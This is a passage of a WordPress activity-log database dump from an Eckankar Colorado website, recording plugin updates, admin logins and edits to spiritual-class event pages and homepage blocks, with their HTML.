Thernström</a>'),(241043,40993,'plugin_version','4.7.2'),(241044,40993,'plugin_url','https://simple-history.com'),(241045,40993,'plugin_prev_version','4.7.1'),(241046,40993,'_message_key','plugin_bulk_updated'),(241047,40993,'_user_id','2'),(241048,40993,'_user_login','S8zhaBda'),(241049,40993,'_user_email','nada@zipnadanot.org'),(241050,40993,'_server_remote_addr','76.130.120.x'),(241051,40993,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241052,40994,'plugin_slug','wp-fastest-cache'),(241053,40994,'plugin_name','WP Fastest Cache'),(241054,40994,'plugin_title','<a href=\"http://wordpress.org/plugins/wp-fastest-cache/\">WP Fastest Cache</a>'),(241055,40994,'plugin_description','The simplest and fastest WP Cache system <cite>By <a href=\"https://www.wpfastestcache.com/\">Emre Vona</a>.</cite>'),(241056,40994,'plugin_author','<a href=\"https://www.wpfastestcache.com/\">Emre Vona</a>'),(241057,40994,'plugin_version','1.2.1'),(241058,40994,'plugin_url','http://wordpress.org/plugins/wp-fastest-cache/'),(241059,40994,'plugin_prev_version','1.2.0'),(241060,40994,'_message_key','plugin_bulk_updated'),(241061,40994,'_user_id','2'),(241062,40994,'_user_login','S8zhaBda'),(241063,40994,'_user_email','nada@zipnadanot.org'),(241064,40994,'_server_remote_addr','76.130.120.x'),(241065,40994,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241066,40995,'_user_id','2'),(241067,40995,'_user_login','S8zhaBda'),(241068,40995,'_user_email','nada@zipnadanot.org'),(241069,40995,'_message_key','user_logged_out'),(241070,40995,'_server_remote_addr','76.130.120.x'),(241071,40995,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(241072,40996,'plugin_name','Fluent Forms'),(241073,40996,'plugin_current_version','5.1.0'),(241074,40996,'plugin_new_version','5.1.1'),(241075,40996,'_message_key','plugin_update_available'),(241076,40996,'_server_remote_addr','173.231.231.x'),(241077,40997,'user_id','15'),(241078,40997,'user_email','nadazipought@zilch.org'),(241079,40997,'user_login','john-admin-96'),(241080,40997,'_user_id','15'),(241081,40997,'_user_login','john-admin-96'),(241082,40997,'_user_email','nadazipought@zilch.org'),(241083,40997,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(241084,40997,'_message_key','user_logged_in'),(241085,40997,'_server_remote_addr','184.96.209.x'),(241086,40997,'_server_http_referer','https://eckankar-colorado.org/wp-login.php'),(241087,40998,'post_id','269340'),(241088,40998,'post_type','mec-events'),(241089,40998,'post_title','Copy of Past Lives, Dreams, and Soul Travel'),(241090,40998,'_message_key','post_updated'),(241091,40998,'_user_id','15'),(241092,40998,'_user_login','john-admin-96'),(241093,40998,'_user_email','nadazipought@zilch.org'),(241094,40998,'_server_remote_addr','184.96.209.x'),(241095,40998,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?post_type=mec-events'),(241096,40999,'post_type','attachment'),(241097,40999,'attachment_id','269342'),(241098,40999,'attachment_title','SpiritualMeetingPlace'),(241099,40999,'attachment_filename','SpiritualMeetingPlace.webp'),(241100,40999,'attachment_mime','image/webp'),(241101,40999,'attachment_filesize','9672'),(241102,40999,'attachment_parent_id','269340'),(241103,40999,'attachment_parent_title','Copy of Past Lives, Dreams, and Soul Travel'),(241104,40999,'attachment_parent_post_type','mec-events'),(241105,40999,'_message_key','attachment_created'),(241106,40999,'_user_id','15'),(241107,40999,'_user_login','john-admin-96'),(241108,40999,'_user_email','nadazipought@zilch.org'),(241109,40999,'_server_remote_addr','184.96.209.x'),(241110,40999,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269340&action=edit'),(241111,41000,'post_id','269340'),(241112,41000,'post_type','mec-events'),(241113,41000,'post_title','Explore the Reality of Spiritual Experiences'),(241114,41000,'post_prev_post_title','Copy of Past Lives, Dreams, and Soul Travel'),(241115,41000,'post_new_post_title','Explore the Reality of Spiritual Experiences'),(241116,41000,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Past Lives, Dreams and Soul Travel<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Have you ever thought about where you go when you close your eyes - when you daydream, or at night when you dream? Sometimes our dreams and imagination seem more real than everyday life. That\'s Soul Travel. It\'s a natural process that opens the door to the incredible universes where we truly live and have our being. </span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">As Soul, a divine spark of God, we are spiritual beings with the ability to shift our state of consciousness at will and experience greater love, freedom and awareness in our daily lives. This interactive class will focus primarily on Soul Travel, (but will likely touch on Past Lives and Dreams too.) We will cover tools, or techniques, you can use on your spiritual journey, regardless of your spiritual orientation. You do not need to have attended prior classes or have read the book to participate. We will have complimentary copies available. This is the&nbsp;<strong>second</strong>&nbsp;of two classes on Soul Travel. Hope to see you there!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR.</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/296983282/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241117,41000,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Find Your Own Proof the Easy Way<br>\r\n</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>You came into this life to spread your wings and live in freedom – heart, mind, and Soul. This in-person discussion will introduce keys to embrace the highest expression of who you really are.</strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like to learn how to go beyond your present state of consciousness, by examining yourself honestly – not with the mind, but with the faculties of Soul?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like to learn more about the two aspects of the creative imagination – mental and spiritual, and how they can bring greater spiritual blessings into your life?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like to learn how small daily experiences hold the keys to understanding spiritual experiences?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this Meetup is for you. Techniques will be shared to help you learn how to have more of God’s love and guidance in your life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All our welcome to join us.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by ECKANKAR as a community service, is a spiritual resource for people of all faiths and beliefs. ECKANKAR is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore your own unique relationship with the Divine.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-parker/events/297109965/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241118,41000,'post_prev_post_date','2023-11-04 08:33:54'),(241119,41000,'post_new_post_date','2023-11-04 08:38:24'),(241120,41000,'post_prev_thumb_id','269303'),(241121,41000,'post_prev_thumb_title','ColumnsWater'),(241122,41000,'post_new_thumb_id','269342'),(241123,41000,'post_new_thumb_title','SpiritualMeetingPlace'),(241124,41000,'_message_key','post_updated'),(241125,41000,'_user_id','15'),(241126,41000,'_user_login','john-admin-96'),(241127,41000,'_user_email','nadazipought@zilch.org'),(241128,41000,'_server_remote_addr','184.96.209.x'),(241129,41000,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269340&action=edit'),(241130,41001,'post_id','269340'),(241131,41001,'post_type','mec-events'),(241132,41001,'post_title','Explore the Reality of Spiritual Experiences'),(241133,41001,'post_prev_post_status','draft'),(241134,41001,'post_new_post_status','publish'),(241135,41001,'post_prev_post_date','2023-11-04 08:38:24'),(241136,41001,'post_new_post_date','2023-11-04 08:43:10'),(241137,41001,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(241138,41001,'post_new_post_date_gmt','2023-11-04 14:43:10'),(241139,41001,'_message_key','post_updated'),(241140,41001,'_user_id','15'),(241141,41001,'_user_login','john-admin-96'),(241142,41001,'_user_email','nadazipought@zilch.org'),(241143,41001,'_server_remote_addr','184.96.209.x'),(241144,41001,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269340&action=edit'),(241145,41002,'post_id','269343'),(241146,41002,'post_type','nf_sub'),(241147,41002,'post_title',''),(241148,41002,'_message_key','post_updated'),(241149,41002,'_server_remote_addr','172.226.137.x'),(241150,41002,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(241151,41003,'post_id','269344'),(241152,41003,'post_type','nf_sub'),(241153,41003,'post_title',''),(241154,41003,'_message_key','post_updated'),(241155,41003,'_server_remote_addr','172.226.137.x'),(241156,41003,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(241157,41004,'failed_username','choll.03@comcast.net'),(241158,41004,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(241159,41004,'_message_key','user_unknown_login_failed'),(241160,41004,'_server_remote_addr','76.130.120.x'),(241161,41004,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(241162,41005,'user_id','2'),(241163,41005,'user_email','nada@zipnadanot.org'),(241164,41005,'user_login','S8zhaBda'),(241165,41005,'_user_id','2'),(241166,41005,'_user_login','S8zhaBda'),(241167,41005,'_user_email','nada@zipnadanot.org'),(241168,41005,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(241169,41005,'_message_key','user_logged_in'),(241170,41005,'_server_remote_addr','76.130.120.x'),(241171,41005,'_server_http_referer','https://eckankar-colorado.org/wp-login.php'),(241172,41006,'post_id','269346'),(241173,41006,'post_type','nf_sub'),(241174,41006,'post_title',''),(241175,41006,'_message_key','post_updated'),(241176,41006,'_server_remote_addr','97.180.248.x'),(241177,41006,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(241178,41007,'_user_id','2'),(241179,41007,'_user_login','S8zhaBda'),(241180,41007,'_user_email','nada@zipnadanot.org'),(241181,41007,'_message_key','user_logged_out'),(241182,41007,'_server_remote_addr','76.130.120.x'),(241183,41007,'_server_http_referer','https://eckankar-colorado.org/wp-admin/'),(241184,41008,'user_id','2'),(241185,41008,'user_email','nada@zipnadanot.org'),(241186,41008,'user_login','S8zhaBda'),(241187,41008,'_user_id','2'),(241188,41008,'_user_login','S8zhaBda'),(241189,41008,'_user_email','nada@zipnadanot.org'),(241190,41008,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(241191,41008,'_message_key','user_logged_in'),(241192,41008,'_server_remote_addr','76.130.120.x'),(241193,41008,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(241194,41009,'post_id','269350'),(241195,41009,'post_type','bg_block'),(241196,41009,'post_title','NEW GROUP OF 3 CODE &#8212; FINAL 11/01/2023'),(241197,41009,'_message_key','post_created'),(241198,41009,'_user_id','2'),(241199,41009,'_user_login','S8zhaBda'),(241200,41009,'_user_email','nada@zipnadanot.org'),(241201,41009,'_server_remote_addr','76.130.120.x'),(241202,41009,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post-new.php?post_type=bg_block'),(241203,41010,'post_id','269350'),(241204,41010,'post_type','bg_block'),(241205,41010,'post_title','NEW GROUP OF 3 CODE &#8212; FINAL 11/01/2023'),(241206,41010,'_message_key','post_updated'),(241207,41010,'_user_id','2'),(241208,41010,'_user_login','S8zhaBda'),(241209,41010,'_user_email','nada@zipnadanot.org'),(241210,41010,'_server_remote_addr','76.130.120.x'),(241211,41010,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post-new.php?post_type=bg_block'),(241212,41011,'post_id','269350'),(241213,41011,'post_type','bg_block'),(241214,41011,'post_title','NEW GROUP OF 3 CODE &#8212; FINAL 11/01/2023'),(241215,41011,'post_prev_post_name',''),(241216,41011,'post_new_post_name','new-group-of-3-code-final-11-01-2023'),(241217,41011,'post_prev_post_content','\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\n</div>\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\n</div>\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\n</div>\n</div>\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" class=\"\">\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\n<p class=\"\" style=\"font-size: 15px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\n<p>&nbsp;</p>\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" class=\"\">\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\n<p class=\"\" style=\"text-align: center; font-size: 16px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\n<p class=\"\" style=\"text-align: center; font-size: 15px; margin-bottom: 24px;\">Keep up with all the latest news and events from around the state.</p>\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" class=\"\">\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\n<p class=\"\" style=\"text-align: center; font-size: 15px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\nSoul Travel help you find God</p>\n<p class=\"\" style=\"text-align: center; font-size: 15px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and<br>\n<strong><em>Is Life a Random Walk?</em></strong></p>\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>'),(241218,41011,'post_new_post_content','<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 15px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px; margin-bottom: 24px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and<br>\r\n<strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241219,41011,'post_prev_post_status','draft'),(241220,41011,'post_new_post_status','publish'),(241221,41011,'post_prev_post_date','2023-11-04 11:31:24'),(241222,41011,'post_new_post_date','2023-11-04 11:31:34'),(241223,41011,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(241224,41011,'post_new_post_date_gmt','2023-11-04 17:31:34'),(241225,41011,'_message_key','post_updated'),(241226,41011,'_user_id','2'),(241227,41011,'_user_login','S8zhaBda'),(241228,41011,'_user_email','nada@zipnadanot.org'),(241229,41011,'_server_remote_addr','76.130.120.x'),(241230,41011,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post-new.php?post_type=bg_block&wp-post-new-reload=true'),(241231,41012,'post_id','269352'),(241232,41012,'post_type','bg_block'),(241233,41012,'post_title','NEW HOME PAGE VIDEO Code &#8211;11/3/2023'),(241234,41012,'_message_key','post_created'),(241235,41012,'_user_id','2'),(241236,41012,'_user_login','S8zhaBda'),(241237,41012,'_user_email','nada@zipnadanot.org'),(241238,41012,'_server_remote_addr','76.130.120.x'),(241239,41012,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post-new.php?post_type=bg_block'),(241240,41013,'post_id','269352'),(241241,41013,'post_type','bg_block'),(241242,41013,'post_title','NEW HOME PAGE VIDEO Code &#8211;11/3/2023'),(241243,41013,'post_prev_post_name',''),(241244,41013,'post_new_post_name','new-home-page-video-code-11-3-2023'),(241245,41013,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p>&nbsp;</p>\n</div>\n</div>\n</div>\n</div>'),(241246,41013,'post_new_post_content','<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 30px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" 